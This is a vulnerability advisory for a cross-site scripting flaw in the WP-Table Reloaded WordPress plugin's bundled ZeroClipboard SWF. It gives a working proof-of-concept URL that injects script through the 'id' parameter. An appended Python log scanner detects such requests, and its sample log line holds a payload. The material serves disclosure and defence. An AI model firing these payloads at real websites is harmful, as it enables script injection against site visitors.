Wordpress Plugins - WP-Table Reloaded <== XSS


##################################################
# Description : Wordpress Plugins - WP-Table Reloaded <== XSS
# Version : -
# Date : 7/8/2013
# Author : Ryuzaki Lawlet / Fahmi Fisal @Justryuz (ryuzaki_l@y7mail.com)
##################################################

About:
WP-Table Reloaded enables you to create and manage tables in your WP's admin area.
No HTML knowledge is needed. A comfortable backend allows you to easily edit table data.
Tables can contain any type of data, and additional JavaScript libraries can be used to extend
them with features like sorting, pagination, filtering, and more. You can include the tables in your posts,
on your pages or in text widgets by using a shortcode or a template tag function. Tables can be imported and
exported from/to CSV, XML and HTML.

The WP-Table Reloaded plugin for WordPress contains vulnerabilities
which can be exploited by malicious people to conduct cross-site scripting attacks.
The vulnerabilities are caused by a bundled vulnerable version of ZeroClipboard.
Cross-site scripting vulnerabilities in ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103)
affect ZeroClipboard itself and multiple web applications that bundle it.

Affected products:
All versions are vulnerable.

Affected vendors:
WP-Table Reloaded
http://wordpress.org/plugins/wp-table-reloaded/

Details:
Cross-Site Scripting (WASC-08):
XSS via the id parameter, and XSS via copying the payload into the clipboard

POC:
http://site/wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(/XSS/)//&width&height
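As an added defender-side example (not part of the original advisory), the following log check flags requests for the plugin's zeroclipboard.swf whose id parameter is not a plain element identifier, which is the pattern a reflected payload like the one above would leave in an access log. The allowed-id pattern and the sample log lines are assumptions constructed for this example.

```python
# Added example, not part of the original advisory: scan web server access
# logs for requests to ZeroClipboard's SWF whose "id" query parameter is not
# a plain DOM element id. The SWF reflects this value into JavaScript, so
# quotes, parentheses or braces in it are worth an alert.
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: a legitimate ZeroClipboard id is a short DOM id like "ZeroClipboardMovie_1".
SAFE_ID = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

# Request field of an Apache/nginx combined-format log line: "METHOD TARGET HTTP/x.y"
REQ = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_swf_request(line: str):
    """Return (client_ip, id_value) when the line is a zeroclipboard.swf request
    whose id does not look like a plain element id; otherwise return None."""
    m = REQ.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.lower().endswith("/zeroclipboard.swf"):
        return None
    for raw in parse_qs(parts.query, keep_blank_values=True).get("id", []):
        value = unquote(raw)  # parse_qs decoded once; decode again to catch double encoding
        if not SAFE_ID.match(value):
            return line.split(" ", 1)[0], value
    return None


def scan(lines):
    """Run the check over an iterable of log lines and return the list of hits."""
    return [hit for hit in (suspicious_swf_request(l) for l in lines) if hit]


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Aug/2013:10:00:01 +0000] "GET /wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf?id=ZeroClipboardMovie_1&width=12&height=12 HTTP/1.1" 200 4100',
    '203.0.113.9 - - [07/Aug/2013:10:00:05 +0000] "GET /wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf?id=x%22)%3Balert(1)%2F%2F&width&height HTTP/1.1" 200 4100',
    '203.0.113.9 - - [07/Aug/2013:10:00:06 +0000] "GET /wp-content/plugins/wp-table-reloaded/js/tabletools/TableTools.js HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"ALERT {client} zeroclipboard.swf id={value!r}")
```

The check only sees GET query strings, so it is a detection aid; the fix remains removing or updating the bundled ZeroClipboard SWF.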

Provided and/or discovered by:
Ryuzaki Lawlet / Fahmi Fisal @justryuz
